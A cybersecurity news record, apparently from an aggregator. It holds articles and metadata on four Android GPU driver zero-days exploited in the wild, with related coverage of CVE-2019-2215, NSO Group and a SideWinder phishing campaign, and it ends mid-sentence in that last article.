Android Issues Patches for 4 New Zero-Day Bugs Exploited in the Wild

2021-05-20T05:13:00

Description

[![](https://thehackernews.com/images/--bQd_wXz_co/YKXvNNPXGpI/AAAAAAAAClU/c5Se7viT_Ewh2TJZaiUOQmpA_FBdof58QCLcBGAsYHQ/s0/ANDROID.jpg)](<https://thehackernews.com/images/--bQd_wXz_co/YKXvNNPXGpI/AAAAAAAAClU/c5Se7viT_Ewh2TJZaiUOQmpA_FBdof58QCLcBGAsYHQ/s0/ANDROID.jpg>) Google on Wednesday updated its May 2021 Android Security Bulletin to disclose that four of the security vulnerabilities that were patched earlier this month by Arm and Qualcomm may have been exploited in the wild as zero-days. "There are indications that CVE-2021-1905, CVE-2021-1906, CVE-2021-28663 and CVE-2021-28664 may be under limited, targeted exploitation," the search giant [said](<https://source.android.com/security/bulletin/2021-05-01>) in an updated alert. The four flaws impact [Qualcomm Graphics](<https://www.qualcomm.com/company/product-security/bulletins/may-2021-bulletin>) and [Arm Mali GPU Driver](<https://developer.arm.com/support/arm-security-updates/mali-gpu-kernel-driver>) modules — * **CVE-2021-1905** (CVSS score: 8.4) - A use-after-free flaw in Qualcomm's graphics component due to improper handling of memory mapping of multiple processes simultaneously. * **CVE-2021-1906** (CVSS score: 6.2) - A flaw concerning inadequate handling of address deregistration that could lead to new GPU address allocation failure. * **CVE-2021-28663** (CVSS score: NA) - A vulnerability in Arm Mali GPU kernel that could permit a non-privileged user to make improper operations on GPU memory, leading to a use-after-free scenario that could be exploited to gain root privilege or disclose information. * **CVE-2021-28664** (CVSS score: NA) - An unprivileged user can achieve read/write access to read-only memory, enabling privilege escalation or a denial-of-service (DoS) condition due to memory corruption. Successful exploitation of the weaknesses could grant an adversary carte blanche access to the targeted device and take over control. It's, however, not clear how the attacks themselves were carried out, the victims that may have been targeted, or the threat actors that may be abusing them. The development marks one of the rare instances where zero-day bugs in Android have been spotted in real-world cyber offensives. Earlier this March, Google revealed that a vulnerability affecting Android devices that use Qualcomm chipsets ([CVE-2020-11261](<https://thehackernews.com/2021/03/warning-new-android-zero-day.html>)) was being weaponized by adversaries to launch targeted attacks. The other flaw is [CVE-2019-2215](<https://nvd.nist.gov/vuln/detail/CVE-2019-2215>), a vulnerability in [Binder](<https://developer.android.com/reference/android/os/Binder>) — Android's inter-process communication mechanism — that's said to have been allegedly exploited by the NSO Group as well as [SideWinder threat actor](<https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html>) to compromise a victim's device and collect user information. Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:9CE461E69A8B499207911497E3A349FD", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Android Issues Patches for 4 New Zero-Day Bugs Exploited in the Wild", "description": "[![](https://thehackernews.com/images/--bQd_wXz_co/YKXvNNPXGpI/AAAAAAAAClU/c5Se7viT_Ewh2TJZaiUOQmpA_FBdof58QCLcBGAsYHQ/s0/ANDROID.jpg)](<https://thehackernews.com/images/--bQd_wXz_co/YKXvNNPXGpI/AAAAAAAAClU/c5Se7viT_Ewh2TJZaiUOQmpA_FBdof58QCLcBGAsYHQ/s0/ANDROID.jpg>)\n\nGoogle on Wednesday updated its May 2021 Android Security Bulletin to disclose that four of the security vulnerabilities that were patched earlier this month by Arm and Qualcomm may have been exploited in the wild as zero-days.\n\n\"There are indications that CVE-2021-1905, CVE-2021-1906, CVE-2021-28663 and CVE-2021-28664 may be under limited, targeted exploitation,\" the search giant [said](<https://source.android.com/security/bulletin/2021-05-01>) in an updated alert.\n\nThe four flaws impact [Qualcomm Graphics](<https://www.qualcomm.com/company/product-security/bulletins/may-2021-bulletin>) and [Arm Mali GPU Driver](<https://developer.arm.com/support/arm-security-updates/mali-gpu-kernel-driver>) modules \u2014\n\n * **CVE-2021-1905** (CVSS score: 8.4) - A use-after-free flaw in Qualcomm's graphics component due to improper handling of memory mapping of multiple processes simultaneously.\n * **CVE-2021-1906** (CVSS score: 6.2) - A flaw concerning inadequate handling of address deregistration that could lead to new GPU address allocation failure.\n * **CVE-2021-28663** (CVSS score: NA) - A vulnerability in Arm Mali GPU kernel that could permit a non-privileged user to make improper operations on GPU memory, leading to a use-after-free scenario that could be exploited to gain root privilege or disclose information. \n * **CVE-2021-28664** (CVSS score: NA) - An unprivileged user can achieve read/write access to read-only memory, enabling privilege escalation or a denial-of-service (DoS) condition due to memory corruption.\n\nSuccessful exploitation of the weaknesses could grant an adversary carte blanche access to the targeted device and take over control. It's, however, not clear how the attacks themselves were carried out, the victims that may have been targeted, or the threat actors that may be abusing them.\n\nThe development marks one of the rare instances where zero-day bugs in Android have been spotted in real-world cyber offensives.\n\nEarlier this March, Google revealed that a vulnerability affecting Android devices that use Qualcomm chipsets ([CVE-2020-11261](<https://thehackernews.com/2021/03/warning-new-android-zero-day.html>)) was being weaponized by adversaries to launch targeted attacks. The other flaw is [CVE-2019-2215](<https://nvd.nist.gov/vuln/detail/CVE-2019-2215>), a vulnerability in [Binder](<https://developer.android.com/reference/android/os/Binder>) \u2014 Android's inter-process communication mechanism \u2014 that's said to have been allegedly exploited by the NSO Group as well as [SideWinder threat actor](<https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html>) to compromise a victim's device and collect user information.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-05-20T05:13:00", "modified": "2021-05-20T05:35:42", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/05/android-issues-patches-for-4-new-zero.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2019-2215", "CVE-2020-11261", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-28663", "CVE-2021-28664"], "immutableFields": [], "lastseen": "2022-05-09T12:38:02", "viewCount": 92, "enchantments": {"dependencies": {"references": [{"type": "androidsecurity", "idList": ["ANDROID:2019-10-01", "ANDROID:2021-01-01", "ANDROID:2021-05-01"]}, {"type": "attackerkb", "idList": ["AKB:513E78C5-A9BA-4905-8241-8357FAC786ED", "AKB:AAD3528A-95B0-4506-889F-B89CADC8ADE4", "AKB:AAE507C1-8527-4F4A-9456-38A03B4A132E", "AKB:B0D45425-6D7E-4251-BCA3-D03D8F4E38F9", "AKB:BA28E8DC-1A4B-454B-BA40-8D90DBEA1695", "AKB:D6B08A6F-BF93-44E7-BA9D-013105E53B81"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1650"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "cve", "idList": ["CVE-2019-2215", "CVE-2020-11261", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-28663", "CVE-2021-28664"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2068-1:83234", "DEBIAN:DLA-2114-1:93D37"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-2215"]}, {"type": "exploitdb", "idList": ["EDB-ID:47463", "EDB-ID:48129"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26D7BAD60A41B55F7B4B1D7EE2CEFA71"]}, {"type": "fireeye", "idList": ["FIREEYE:A819772457030262D1150428E2B4438C"]}, {"type": "githubexploit", "idList": ["1389F843-6C58-5A37-9A59-F04A86E79830", "1E11762E-7475-5A41-813C-F4C2B8595BB2", "2F22A06D-FEEB-5FB6-B41B-CA9039EA5BA0", "35A68674-C566-5E2C-945A-C1DC41874B50", "45006C08-C4BB-5BEA-8F4D-EFCCD7EBD323", "4F143355-FABD-5536-9EC1-57EFFE95C643", "5C3FD7E3-2195-5B66-A20A-8AA8E5EC3898", "71A053F3-CAE4-55AC-9FC2-394F41225593", "8DF22333-4C9A-57D1-BE23-9B67FFD6ECA1", "CF92EDDD-9AFA-57FB-A19D-3602342AEB5C", "EDEECD8E-68A4-5EE4-AC77-C29821562CB4"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C92742E03566423141C670F4E6043468", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20191030-01-BINDER"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EB04567CC0DCC2AA6FDDD6A780E6AFE7"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-ANDROID-LOCAL-BINDER_UAF-"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2068.NASL", "DEBIAN_DLA-2114.NASL", "EULEROS_SA-2019-2693.NASL", "EULEROS_SA-2020-1396.NASL", "EULEROS_SA-2020-1674.NASL", "SLACKWARE_SSA_2019-311-01.NASL", "UBUNTU_USN-4186-1.NASL", "UBUNTU_USN-4186-3.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844231", "OPENVAS:1361412562310844236", "OPENVAS:1361412562310892068", "OPENVAS:1361412562310892114", "OPENVAS:1361412562311220192693", "OPENVAS:1361412562311220201396", "OPENVAS:1361412562311220201674"]}, {"type": "osv", "idList": ["OSV:DLA-2068-1", "OSV:DLA-2114-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154911", "PACKETSTORM:156495"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-2215"]}, {"type": "slackware", "idList": ["SSA-2019-311-01"]}, {"type": "symantec", "idList": ["SMNTC-110334"]}, {"type": "thn", "idList": ["THN:33EE2AABD7698C9F1FB70B5D087F8455", "THN:37E4ECDE5CC5E074EC9FD4DF79D85121", "THN:72A5D71BAB2248262B7A53E955BB655D", "THN:E25E9F7F90F8EF4E9E484972EB0AF3FD", "THN:EC10AE2E48A69D256BF21E48AE391477", "THN:EF60CC49D6364DA3E070A9958D3CCDB7"]}, {"type": "threatpost", "idList": ["THREATPOST:17E00AD621A0ECD9F90FE97E083BF4AC", "THREATPOST:38BE049C6C451ED1B9E3037B2EA65D9A", "THREATPOST:567B75FB2DD20E431D44DCB39A708BD2", "THREATPOST:B5FB954E071EBB6310CA545E6D56450B", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:EE2AEE2890C68D08EC9D94814398994C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:39422CC894D802D7548B0FA2E924E41B"]}, {"type": "ubuntu", "idList": ["USN-4186-1", "USN-4186-3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-2215", "UB:CVE-2020-0030"]}, {"type": "zdt", "idList": ["1337DAY-ID-33326", "1337DAY-ID-34015"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "androidsecurity", "idList": ["ANDROID:2019-10-01", "ANDROID:2021-01-01", "ANDROID:2021-05-01"]}, {"type": "attackerkb", "idList": ["AKB:513E78C5-A9BA-4905-8241-8357FAC786ED"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1650"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "cve", "idList": ["CVE-2019-2215"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2068-1:83234", "DEBIAN:DLA-2114-1:93D37"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-2215"]}, {"type": "exploitdb", "idList": ["EDB-ID:47463", "EDB-ID:48129"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26D7BAD60A41B55F7B4B1D7EE2CEFA71"]}, {"type": "fireeye", "idList": ["FIREEYE:A819772457030262D1150428E2B4438C"]}, {"type": "githubexploit", "idList": ["1389F843-6C58-5A37-9A59-F04A86E79830", "1E11762E-7475-5A41-813C-F4C2B8595BB2", "2F22A06D-FEEB-5FB6-B41B-CA9039EA5BA0", "45006C08-C4BB-5BEA-8F4D-EFCCD7EBD323", "4F143355-FABD-5536-9EC1-57EFFE95C643", "5C3FD7E3-2195-5B66-A20A-8AA8E5EC3898", "71A053F3-CAE4-55AC-9FC2-394F41225593", "8DF22333-4C9A-57D1-BE23-9B67FFD6ECA1", "CF92EDDD-9AFA-57FB-A19D-3602342AEB5C", "EDEECD8E-68A4-5EE4-AC77-C29821562CB4"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C92742E03566423141C670F4E6043468"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20191030-01-BINDER"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EB04567CC0DCC2AA6FDDD6A780E6AFE7"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/ANDROID/LOCAL/BINDER_UAF"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2068.NASL", "DEBIAN_DLA-2114.NASL", "SLACKWARE_SSA_2019-311-01.NASL", "UBUNTU_USN-4186-1.NASL", "UBUNTU_USN-4186-3.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844231", "OPENVAS:1361412562310844236", "OPENVAS:1361412562310892068", "OPENVAS:1361412562310892114"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154911", "PACKETSTORM:156495"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-2215"]}, {"type": "slackware", "idList": ["SSA-2019-311-01"]}, {"type": "symantec", "idList": ["SMNTC-110334"]}, {"type": "thn", "idList": ["THN:72A5D71BAB2248262B7A53E955BB655D", "THN:E25E9F7F90F8EF4E9E484972EB0AF3FD"]}, {"type": "threatpost", "idList": ["THREATPOST:38BE049C6C451ED1B9E3037B2EA65D9A", "THREATPOST:B5FB954E071EBB6310CA545E6D56450B", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:EE2AEE2890C68D08EC9D94814398994C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:39422CC894D802D7548B0FA2E924E41B"]}, {"type": "ubuntu", "idList": ["USN-4186-1", "USN-4186-3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-2215"]}, {"type": "zdt", "idList": ["1337DAY-ID-33326", "1337DAY-ID-34015"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-2215", "epss": "0.003760000", "percentile": "0.685190000", "modified": "2023-03-16"}, {"cve": "CVE-2020-11261", "epss": "0.000890000", "percentile": "0.361890000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1905", "epss": "0.000890000", "percentile": "0.361890000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1906", "epss": "0.002280000", "percentile": "0.592570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-28663", "epss": "0.009020000", "percentile": "0.802990000", "modified": "2023-03-17"}, {"cve": "CVE-2021-28664", "epss": "0.004200000", "percentile": "0.701790000", "modified": "2023-03-17"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1659998956, "score": 1684007986, "epss": 1679073339}, "_internal": {"score_hash": "440e7cbbe3d21810bd034838cc50773b"}}

{"threatpost": [{"lastseen": "2021-05-21T14:02:25", "description": "Google updated its May 3 Android security [bulletin](<https://source.android.com/security/bulletin/2021-05-01#mitigations>) on Wednesday to say that there are \u201cindications\u201d that four of the 50 vulnerabilities \u201cmay be under limited, targeted exploitation.\u201d That was mostly confirmed by Maddie Stone, a member of Google\u2019s Project Zero exploit research group, who clarified on Twitter that the \u201c4 vulns were exploited in-the-wild\u201d as zero-days.\n\n> Android has updated the May security with notes that 4 vulns were exploited in-the-wild. \n> \n> Qualcomm GPU: CVE-2021-1905, CVE-2021-1906 \nARM Mali GPU: CVE-2021-28663, CVE-2021-28664<https://t.co/mT8vE2Us74>\n> \n> \u2014 Maddie Stone (@maddiestone) [May 19, 2021](<https://twitter.com/maddiestone/status/1395004346996248586?ref_src=twsrc%5Etfw>)\n\nGoogle Android exploits are a rarity. These four bugs make up a full two-thirds of the six total bugs to be exploited in the wild since 2014, according to Google\u2019s tracking [spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1123292625>). Project Zero\u2019s Stone went on to celebrate that fact, pointing out that \u201cFor 2021, we\u2019ve surpassed the number of 0-days detected in-the-wild in all of 2020. That\u2019s great!\u201d\n\nAccording to security firm Zimperium, Google disclosed only one zero-day vulnerability in Android in 2020.\n\n## Could Give Attackers \u2018Complete Control\u2019 of Androids\n\nIs finding four zero-days really all that great? These four bugs could give attackers complete control of Android devices. All four affect GPU firmware code. Two of the bugs impact the ARM Mali GPU driver, while the other two are found in the Qualcomm Snapdragon CPU graphics component.\n\nCVE | Description \n---|--- \n[CVE-2021-1905](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1905>) | Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. \n[CVE-2021-1906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1906>) | Improper handling of address deregistration on failure can lead to new GPU address allocation failure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. \n[CVE-2021-28663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28663>) | The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0. \n[CVE-2021-28664](<http://CVE-2021-28664>) | The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r8p0 through r30p0. \n \nAsaf Peleg, vice president of strategic projects for Zimperium, told [Ars Technica](<https://arstechnica.com/gadgets/2021/05/hackers-have-been-exploiting-4-critical-android-vulnerabilities/>) that successful exploits of the vulnerabilities \u201cwould give complete control of the victim\u2019s mobile endpoint. From elevating privileges beyond what is available by default to executing code outside of the current process\u2019s existing sandbox, the device would be fully compromised, and no data would be safe.\u201d\n\nThis is the second time this month that Qualcomm has suffered chip woes. As Check Point Research reported in early May, a vulnerability in a 5G modem data service could allow a malicious app to exploit the issue, opening up Android phones to [attackers being able to eavesdrop](<https://threatpost.com/qualcomm-chip-bug-android-eavesdropping/165934/>), inject, malicious code into a phone\u2019s modem, access call histories and text messages: a problem that could affect up to 30 percent of Android phones.\n\n## One Exploit May Be Tied to Spyware Maker NSO Group\n\nAs [The Record](<https://therecord.media/arm-and-qualcomm-zero-days-quietly-patched-in-this-months-android-security-updates/>) reported, two of the zero-days have previously been exploited in the wild: [CVE-2020-11261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11261>), a bug in the Qualcomm graphics component that was patched in the [January 2021 Android security bulletin](<https://source.android.com/security/bulletin/2021-01-01>), and [CVE-2019-2215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215>), an Android exploit that Project Zero believes was [developed by exploit broker NSO Group](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) and was allegedly being used, abused and sold to its customers throughout 2019.\n\nNSO Group, an Israeli maker of the Pegasus mobile spyware tool, [has long insisted](<https://threatpost.com/nso-group-president-defends-controversial-tactics/150694/>) that its products are meant to be used to fight crime and terror. Whatever governments do with it, NSO Group isn\u2019t in on it, the company has said. That contention was dissected in court in July 2020, during Facebook\u2019s lawsuit over [alleged spying on WhatsApp users.](<https://threatpost.com/facebooks-nso-group-lawsuit-whatsapp-spying/157571/>)\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)\n\nAt the time, Judge Phyllis Hamilton said that it appears that NSO Group \u201cretained some role\u201d in how its wares are used. She also pointed to a statement to the court from CEO Shalev Hulio, which says that NSO Group carries out its activities \u201centirely at the direction of their government customers,\u201d and that it provides \u201cadvice and technical support\u201d for its notorious Pegasus, which is a remote access trojan (RAT). The tool enables governments to send a personalized text message with an infected link to a blank page. Click on it, whether it be on an iOS or Android phone, and the software gains full control over the targeted device, monitoring all messaging, contacts and calendars, and possibly even turning on microphones and cameras for surveillance purposes.\n\nAs far as whether NSO Group is behind these Android zero-day exploits, the sophistication required to exploit these vulnerabilities would be in line with its history. \u201cThe complexity of this mobile attack vector is not unheard of but is outside the capabilities of an attacker with rudimentary or even intermediate knowledge of mobile endpoint hacking,\u201d Peleg said. \u201cAny attacker using this vulnerability is most likely doing so as part of a larger campaign against an individual, enterprise, or government with the goal of stealing critical and private information.\u201d\n\n## How Should Android Fans Protect Themselves?\n\nOnly Android phones that use Arm or Qualcomm GPUs are affected by these bugs. According to recent [Arm](<https://developer.arm.com/support/arm-security-updates/mali-gpu-kernel-driver>) and [Qualcomm](<https://www.qualcomm.com/company/product-security/bulletins/may-2021-bulletin>) security bulletins each of their respected chipsets are impacted. Sources told The Record that this month\u2019s security updates may have been delayed by some smartphone vendors to make sure they shipped the Arm and Qualcomm fixes released on Wednesday.\n\nCheck Point Security Technologies\u2019 Head of Cyber Research, Yaniv Balmas, said via email that \u201cQualcomm, as one of the world\u2019s biggest chip manufacturers, also needs to deal with many security issues found on their products (both internally and externally). This not different than any other vendor of that size. Obviously, bugs found in Qualcomm mobile chips can cause security issues in their hosting devices and operating systems, which is mainly Android.\u201d\n\nThese security issues were found on Qualcomm\u2019s GPU chips, which provide \u201ca very large attack surface,\u201d Balmas told Threatpost. adding that \u201cSuccessful exploitation may lead to a complete phone compromise.\u201d\n\nThreatpost has reached out to Google, NVIDIA ARM and Qualcomm for input on how Android users should proceed.\n\n052121 09:58 UPDATE: Added input from Yaniv Balmas.\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-20T16:50:16", "type": "threatpost", "title": "4 Android Bugs Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-11261", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-28663", "CVE-2021-28664"], "modified": "2021-05-20T16:50:16", "id": "THREATPOST:38BE049C6C451ED1B9E3037B2EA65D9A", "href": "https://threatpost.com/android-bugs-exploited-wild/166347/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-10T12:11:18", "description": "Google is warning of an Android zero-day flaw actively being exploited in the wild, which gives an attacker full control over 18 phone models including its flagship Pixel handset and devices made by Samsung, Huawei and Xiaomi.\n\nGoogle\u2019s Project Zero warned late Thursday that it suspected the vulnerability was being exploited by the controversial Israeli-based NSO Group Technologies or one of its customers. The [NSO Group](<https://threatpost.com/tag/nso-group/>) has been criticized for selling zero-day exploits to \u201cauthorized governments\u201d. It\u2019s believed some of those governments have used NSO technology in targeted attacks against[ human rights activists and journalists](<https://threatpost.com/amnesty-international-targeted-by-nation-state-spyware/134630/>).\n\nProject Zero member Maddie Stone [wrote in a technical post](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) Thursday that there are indicators that the exploit is \u201callegedly being used or sold by the NSO Group.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nFor its part, the NSO Group has publicly denied having anything to do with the exploit, including selling it.\n\nStone said the unpatched vulnerability([CVE-2019-2215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215>)) can be exploited in several ways. In one scenario, a target is enticed to download a rogue app. The second method of infection includes chaining the bug with an additional vulnerability in code the Chrome browser uses to render content.\n\n\u201cIt is a kernel privilege escalation [bug] using a use-after free vulnerability, accessible from inside the Chrome sandbox,\u201d Stone said. \u201cThe vulnerability is exploitable in Chrome\u2019s renderer processes under Android\u2019s \u2018isolated_app\u2019 SELinux domain, leading to us suspecting Binder as the vulnerable component.\u201d\n\nA patch for the vulnerability is expected in the next few days as part of Google\u2019s October Android security update.\n\n\u201cPixel 3 and 3a devices are not vulnerable to this issue, and Pixel 1 and 2 devices will be protected with the October Security Release, which will be delivered in the coming days. Additionally, a patch has been made available to partners in order to ensure the Android ecosystem is protected against this issue,\u201d according to a statement by Google.\n\nAccording to Google Project Zero, the use-after-free bug was patched in 2018 for versions [3.18](<https://android-review.googlesource.com/c/kernel/common/+/609966>), [4.4](<https://android-review.googlesource.com/c/kernel/common/+/573742/>), and [4.9](<https://android-review.googlesource.com/c/kernel/common/+/609868/>) of the Android kernel. However, the fix did not make it to Google\u2019s monthly Android security updates.\n\nA list of vulnerable devices include: Pixel 1, Pixel 1 XL, Pixel 2, Pixel 2 XL, Huawei P20, Xiaomi Redmi 5A, Xiaomi Redmi Note, Xiaomi A1, Oppo A3, Moto Z3, Oreo LG phones, Samsung S7, Samsung S8 and Samsung S9.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-04T16:20:54", "type": "threatpost", "title": "Google Warns of Android Zero-Day Bug Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-04T16:20:54", "id": "THREATPOST:EE2AEE2890C68D08EC9D94814398994C", "href": "https://threatpost.com/google-warns-of-zero-day/148924/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-10T04:06:15", "description": "The SideWinder advanced persistent threat (APT) group has mounted a fresh phishing and malware initiative, using recent territory disputes between China, India, Nepal and Pakistan as lures. The goal is to gather sensitive information from its targets, mainly located in Nepal and Afghanistan.\n\nAccording to an analysis, SideWinder typically targets victims in South Asia and surroundings \u2013 and this latest campaign is no exception. The targets here include multiple government and military units for countries in the region researchers said, including the Nepali Ministries of Defense and Foreign Affairs, the Nepali Army, the Afghanistan National Security Council, the Sri Lankan Ministry of Defense, the Presidential Palace in Afghanistan and more.\n\n[![Threatpost Webinar Promo Bug Bounty](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/09163943/ransomware-Dec-webinar-promo.png)](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar/>)\n\nClick to register.\n\nThe effort mainly makes use of legitimate-looking webmail login pages, aimed at harvesting credentials. Researchers from Trend Micro said that these pages were copied from their victims\u2019 actual webmail login pages and subsequently modified for phishing. For example, \u201cmail-nepalgovnp[.]duckdns[.]org\u201d was created to pretend to be the actual Nepal government\u2019s domain, 